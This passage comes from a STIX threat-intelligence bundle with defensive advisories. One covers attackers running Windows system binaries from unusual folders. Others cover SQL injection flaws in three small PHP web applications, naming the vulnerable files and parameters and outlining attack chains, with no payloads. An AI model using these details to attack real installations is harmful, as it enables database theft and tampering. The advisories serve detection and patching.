      "modified": "2026-07-09T17:20:22Z",
      "name": "Lazarus Group, Sidewinder APT"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b349360-348d-507a-9330-2f22a82f85c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--086c9c29-5ecb-58c9-bee1-e9c268afb432",
      "target_ref": "threat-actor--76a01cce-b03a-5387-b7b2-4aeb5899b7e0"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--086c9c29-5ecb-58c9-bee1-e9c268afb432",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System File Execution Location Anomaly",
      "description": "## Overview\n\nThis threat brief focuses on detecting anomalous executions of standard Windows system binaries from non-standard or unexpected file system locations. While these binaries (such as `certutil.exe`, `dfrgui.exe`, `svchost.exe`, `wsmprovhost.exe`) are legitimate components of the operating system, their execution from directories outside of `C:\\Windows\\System32\\` or other designated system paths is highly suspicious. Threat actors, including groups like Lazarus Group and Sidewinder APT, leverage this technique for defense evasion and stealth, attempting to blend malicious activity with legitimate system processes. By relocating and executing these binaries, adversaries can bypass security controls that only monitor typical system paths, establish persistence, load malicious modules, or achieve other post-exploitation objectives, making their activities harder to detect. This anomaly indicates an active compromise and warrants immediate investigation.\n\n## Attack Chain\n\n1. **Initial Access**: Attacker gains initial access to a system, typically through phishing, exploitation of a public-facing application, or compromised credentials.\n2. **Payload Delivery**: A malicious payload (e.g., a custom tool, a stealer, or a loader) is delivered to the victim's machine, often written to a temporary or user-controlled directory like `C:\\ProgramData\\` or `C:\\Users\\Public\\`.\n3. **Staging System Binaries**: The attacker copies a legitimate Windows system binary (e.g., `certutil.exe`, `dfrgui.exe`, `wsmprovhost.exe`) from its standard location (e.g., `C:\\Windows\\System32\\`) to a non-standard directory under their control.\n4. **Malicious Execution**: The attacker executes the copied system binary from the anomalous location, often to perform a specific task such as decoding a payload, loading a malicious DLL, or executing commands.\n5. **Defense Evasion \u0026 Stealth**: Running these binaries from unusual paths helps the attacker evade detection by security tools that are configured to only monitor standard system locations for these processes, creating a blind spot.\n6. **Further Compromise**: The execution facilitates subsequent attack stages, which could include privilege escalation, lateral movement, data exfiltration, or the deployment of ransomware.\n7. **Persistence**: The attacker may configure the executed binary to restart or perform tasks persistently by modifying startup locations or scheduled tasks.\n\n## Impact\n\nSuccessful exploitation using this technique can lead to significant compromise of affected systems and data. By using legitimate system binaries from unusual locations, attackers achieve a higher degree of stealth, making their activities more challenging for defenders to identify. This can result in prolonged dwell times, enabling comprehensive network reconnaissance, extensive data exfiltration, and establishment of resilient persistence mechanisms. The ultimate impact can range from the theft of sensitive intellectual property and credentials to the complete disruption of critical business operations through ransomware deployment. Specific incidents have shown groups like Lazarus Group leveraging this for information stealing and further network compromise.\n\n## Recommendation\n\n* Deploy the Sigma rule `System File Execution Location Anomaly` to your SIEM and tune for your environment to detect suspicious executions.\n* Ensure process creation logging is enabled across all Windows endpoints, specifically for `Image` and `CommandLine` fields, to provide telemetry for the `process_creation` log source.\n* Investigate all alerts generated by the `System File Execution Location Anomaly` rule, paying close attention to the full path of the executed image and its parent process.\n* Implement application control mechanisms (e.g., Windows Defender Application Control, AppLocker) to restrict execution of binaries from non-standard locations, especially for critical system components.\n",
      "published": "2026-07-08T23:28:00Z",
      "labels": [
        "defense-evasion",
        "stealth",
        "execution",
        "windows",
        "process-anomaly"
      ],
      "object_refs": [
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "threat-actor--76a01cce-b03a-5387-b7b2-4aeb5899b7e0"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://twitter.com/GelosSnake/status/934900723426439170"
        },
        {
          "source_name": "reference",
          "url": "https://asec.ahnlab.com/en/39828/"
        },
        {
          "source_name": "reference",
          "url": "https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--142b3ee0-2ebd-54ac-9efa-2fa191115c3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--732b20c7-c08a-5311-8e78-7adcfb34d46b",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d78ab375-5db4-57ef-81c8-6d9467eb341f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--732b20c7-c08a-5311-8e78-7adcfb34d46b",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--732b20c7-c08a-5311-8e78-7adcfb34d46b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-15134: SQL Injection in CodeAstro Simple Online Leave Management System",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2026-15134, has been identified in CodeAstro Simple Online Leave Management System version 1.0. This flaw specifically affects an unspecified functionality within the `index.php` file under the `/SimpleOnlineLeave/` directory. By manipulating the `email` argument in a remote web request, an unauthenticated attacker can inject malicious SQL code, gaining unauthorized access to the underlying database. The vulnerability has a CVSS v3.1 base score of 7.3 (High) and is particularly concerning as its exploit has been publicly disclosed and is actively available for use. This poses a significant risk to organizations using this system, as it could lead to sensitive data exposure, modification, or deletion, undermining the integrity and confidentiality of the leave management system.\n\n## Attack Chain\n\n1. An unauthenticated remote attacker crafts a malicious HTTP request targeting the vulnerable CodeAstro Simple Online Leave Management System 1.0 web application.\n2. The attacker sends this request to the `/SimpleOnlineLeave/index.php` endpoint on the exposed server.\n3. The request includes a specially crafted SQL injection payload embedded within the `email` argument, either as a GET query parameter or a POST form field.\n4. The vulnerable application processes the `email` argument without proper sanitization or validation, directly incorporating the malicious input into a backend SQL query.\n5. The injected SQL code is executed by the database, allowing the attacker to bypass authentication, retrieve sensitive information, or manipulate database records.\n6. The attacker leverages the unauthorized database access to exfiltrate confidential data (e.g., user credentials, leave records), alter application behavior, or potentially achieve further system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-15134 can lead to severe consequences for affected organizations. Attackers can gain unauthorized access to the application's database, leading to the compromise of sensitive employee information, such as personal details, leave histories, and potentially payroll-related data. Data integrity can be severely damaged through unauthorized modification or deletion of records, disrupting business operations and leading to compliance failures. In some cases, depending on database privileges and configuration, attackers might achieve arbitrary code execution on the underlying server, further escalating the compromise to the entire host system. The public disclosure of the exploit increases the likelihood of widespread exploitation by various threat actors.\n\n## Recommendation\n\n* **Immediate Patching**: Prioritize patching CodeAstro Simple Online Leave Management System 1.0 to a non-vulnerable version if available. If no patch is available, implement immediate compensating controls.\n* **Web Application Firewall (WAF)**: Deploy a WAF in front of affected web servers and configure it to detect and block common SQL injection patterns in HTTP request parameters, especially for `email` arguments targeting `index.php`.\n* **Log Monitoring**: Deploy the Sigma rule `CVE-2026-15134: SQL Injection in CodeAstro Simple Online Leave Management System` to your SIEM to detect exploitation attempts.\n* **Input Validation**: Review and implement strict server-side input validation for all user-supplied data, particularly for the `email` argument within `index.php`, to prevent SQL injection.\n* **Principle of Least Privilege**: Ensure that the database user account used by the web application has only the minimum necessary permissions, reducing the impact of a successful SQL injection.\n",
      "published": "2026-07-09T00:18:56Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "remote-code-execution",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15134"
        },
        {
          "source_name": "reference",
          "url": "https://codeastro.com/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/yihaofuweng/cve/issues/71"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-15134"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/851046"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376949"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376949/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--258b333d-87da-5290-8595-334a1679d16a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad5b6ce6-d787-5c05-a691-6af3996b8bb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--258b333d-87da-5290-8595-334a1679d16a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--00f1d951-342b-50cc-9bc2-f7d070a8d8cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/susususua-AI/CVE/issues/1",
      "pattern": "[url:value = 'https://github.com/susususua-AI/CVE/issues/1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0420b6c-9c8e-5be6-bb37-8d3a7450ae47",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--00f1d951-342b-50cc-9bc2-f7d070a8d8cd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c7527b85-293a-55e3-8ee0-bd02472e5100",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-15135",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-15135']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7535e755-9a0e-557f-97b9-8d85092b3df6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--c7527b85-293a-55e3-8ee0-bd02472e5100"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dcb8700c-ef3b-573c-943c-b2079a095f11",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/851065",
      "pattern": "[url:value = 'https://vuldb.com/submit/851065']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b5ae167-292c-548e-9596-66fdd864663d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--dcb8700c-ef3b-573c-943c-b2079a095f11"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--17311a3a-ffbd-5ec8-9f2d-d0b4894fc816",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376951",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376951']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fde9c682-57ca-5bf2-bebc-6254dac11599",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--17311a3a-ffbd-5ec8-9f2d-d0b4894fc816"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1b365249-014c-5519-bc86-8eff62579ab9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376951/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376951/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d92555d-b151-5ef5-8461-c090580e441a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--1b365249-014c-5519-bc86-8eff62579ab9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--370b3cc4-0b19-557f-b665-35d70d399d14",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "other: /edit_food_items.php",
      "pattern": "[x-ti-bot:other = '/edit_food_items.php']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:20:07Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6562ab12-c6cd-5d7a-9eae-9629d546854d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "indicator--370b3cc4-0b19-557f-b665-35d70d399d14"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--41e3aa8e-cf8d-5319-92fa-275c6543c677",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--529d0d85-28c8-5b62-8ebf-13a887db9f60",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d0883bc-5ea0-5a90-904e-fd17af02e39c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--65e01d71-be3d-54cf-bf75-23ab09932d9f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-15135 - SQL Injection in code-projects Online Food Order System",
      "description": "## Overview\n\nA high-severity SQL injection vulnerability, tracked as CVE-2026-15135, has been identified in version 1.0 of the code-projects Online Food Order System. The flaw specifically resides in the `/edit_food_items.php` file, where improper neutralization of special elements in the 'update' argument allows for remote SQL injection. This vulnerability enables attackers to manipulate or disclose sensitive data from the backend database. The exploit for this flaw has been publicly released, significantly increasing the likelihood of active exploitation by malicious actors. Organizations using this system are at immediate risk of data breaches or data integrity compromise if left unpatched.\n\n## Attack Chain\n\n1. An attacker identifies an internet-facing instance of `code-projects Online Food Order System 1.0`.\n2. The attacker crafts a specially designed HTTP request, potentially a POST request, targeting the `/edit_food_items.php` endpoint.\n3. Within the crafted request, the attacker injects malicious SQL statements into the 'update' argument, bypassing any insufficient input validation.\n4. The vulnerable application processes this request, and due to the lack of proper sanitization, the embedded SQL payload is passed directly to the backend database.\n5. The backend database executes the attacker's malicious SQL query, leading to unauthorized data access or manipulation.\n6. Through the executed query, the attacker can extract sensitive information (e.g., user credentials, financial data) or alter critical application data.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-15135 can lead to unauthorized information disclosure, allowing attackers to exfiltrate sensitive data from the underlying database, such as customer records, administrator credentials, or financial transaction details. Furthermore, the vulnerability permits data manipulation, enabling attackers to alter, delete, or insert arbitrary data, which could lead to service disruption, financial fraud, or defacement. Given that a public exploit is available, organizations using the affected system face an elevated and immediate risk of compromise, potentially affecting business operations and customer trust.\n\n## Recommendation\n\n* Immediately apply patches or vendor-provided mitigations for `CVE-2026-15135` in `code-projects Online Food Order System 1.0` as soon as they become available.\n* Implement and configure a Web Application Firewall (WAF) to detect and block SQL injection attempts, specifically targeting the `/edit_food_items.php` endpoint and the 'update' argument.\n* Deploy the Sigma rule provided in this brief to your SIEM/detection platform to alert on suspicious requests targeting the vulnerable endpoint.\n* Review web server access logs for `code-projects Online Food Order System` for requests to `/edit_food_items.php` containing suspicious parameters.\n",
      "published": "2026-07-09T00:20:07Z",
      "labels": [
        "web-exploitation",
        "sql-injection",
        "cve",
        "data-exfiltration",
        "data-manipulation"
      ],
      "object_refs": [
        "indicator--258b333d-87da-5290-8595-334a1679d16a",
        "indicator--00f1d951-342b-50cc-9bc2-f7d070a8d8cd",
        "indicator--c7527b85-293a-55e3-8ee0-bd02472e5100",
        "indicator--dcb8700c-ef3b-573c-943c-b2079a095f11",
        "indicator--17311a3a-ffbd-5ec8-9f2d-d0b4894fc816",
        "indicator--1b365249-014c-5519-bc86-8eff62579ab9",
        "indicator--370b3cc4-0b19-557f-b665-35d70d399d14",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15135"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/susususua-AI/CVE/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-15135"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/851065"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376951"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376951/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8b7b13c9-c661-595c-8933-da25714f1dd6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:28:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bdb3fc43-38f4-5657-b542-0eac376ff419",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "indicator--8b7b13c9-c661-595c-8933-da25714f1dd6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--72c5bf15-c3b8-50b5-9660-e043a56244e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/susususua-AI/CVE/issues/2",
      "pattern": "[url:value = 'https://github.com/susususua-AI/CVE/issues/2']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:28:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--edd1928d-eb9a-5b74-bab8-c2e23dd5fa19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "indicator--72c5bf15-c3b8-50b5-9660-e043a56244e7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--267c18f3-8bcf-57d6-bdaf-86a9d5fb62e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-15137",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-15137']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:28:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db19d9f4-86a1-578f-8e3e-9b3b32b67fbc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "indicator--267c18f3-8bcf-57d6-bdaf-86a9d5fb62e6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--368f0310-8da9-5d50-b211-3f523fd84eca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/851066",
      "pattern": "[url:value = 'https://vuldb.com/submit/851066']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:28:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93ae80a6-ffdd-5545-b8bf-84f890c7213e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "indicator--368f0310-8da9-5d50-b211-3f523fd84eca"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f583ca44-cf16-5795-8083-6a92646e833c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376952",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376952']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:28:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cf04dad-b979-542f-b62d-e119356178ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "indicator--f583ca44-cf16-5795-8083-6a92646e833c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--779df5af-7864-5453-9ca9-a87a4cce5e02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376952/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376952/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-09T00:28:02Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5bebb044-faa3-5b21-88bd-387f1b5cdf6b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "indicator--779df5af-7864-5453-9ca9-a87a4cce5e02"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca7bc82a-ccbc-577c-a338-8e9cadba2bc0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Repositories",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5bbbc72d-fac0-5cb7-b58d-31a766f39e8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d1df8569-7529-5369-beaf-641cd7a23406",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-15137: Remote SQL Injection in code-projects Interview Management System",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2026-15137, has been identified in version 1.0 of code-projects Interview Management System. The flaw resides within the `\\inc\\classes\\View.php` file, specifically in the handling of the `ID` argument. Attackers can remotely exploit this weakness by manipulating the `ID` parameter in HTTP requests, leading to SQL injection. This allows unauthorized access to or manipulation of the underlying database. The vulnerability has been publicly disclosed, and a proof-of-concept exploit is available, increasing the likelihood of active exploitation. Defenders should prioritize patching or mitigating this vulnerability immediately to prevent potential data breaches, unauthorized data modification, or further system compromise by remote attackers leveraging the public exploit.\n\n## Attack Chain\n\n1. A remote, unauthenticated attacker sends a specially crafted HTTP GET or POST request to the vulnerable `code-projects Interview Management System 1.0` web application.\n2. The request targets the `/inc/classes/View.php` endpoint, including a malicious SQL payload within the `ID` parameter in the URL query string or request body.\n3. The vulnerable application processes the `ID` argument without proper input sanitization, leading to the execution of the attacker's arbitrary SQL queries against the backend database.\n4. Successful exploitation results in the attacker being able to read sensitive data, modify database records, or potentially gain further access to the system via database-specific functions or escalated privileges.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-15137 allows unauthenticated remote attackers to perform arbitrary SQL queries against the application's database. This can lead to unauthorized access to sensitive information stored within the Interview Management System, such as applicant details, interview schedules, or system configurations. Attackers could also tamper with data, modify application behavior, or potentially achieve remote code execution depending on the database's privileges and underlying operating system configuration. The public availability of an exploit increases the risk of widespread attacks targeting unpatched systems, potentially resulting in data breaches and operational disruption.\n\n## Recommendation\n\n* Immediately update `code-projects Interview Management System 1.0` to a patched version if available, or apply vendor-provided mitigations for CVE-2026-15137.\n* Deploy the provided Sigma rule (`CVE-2026-15137: SQL Injection Attempt in Interview Management System`) to your SIEM/detection platform and monitor for suspicious web requests containing SQL injection payloads targeting the `/inc/classes/View.php` endpoint.\n* Ensure comprehensive web server logging is enabled and configured to capture full HTTP request details, including URL paths and query parameters, to facilitate detection and investigation of web-based attacks.\n",
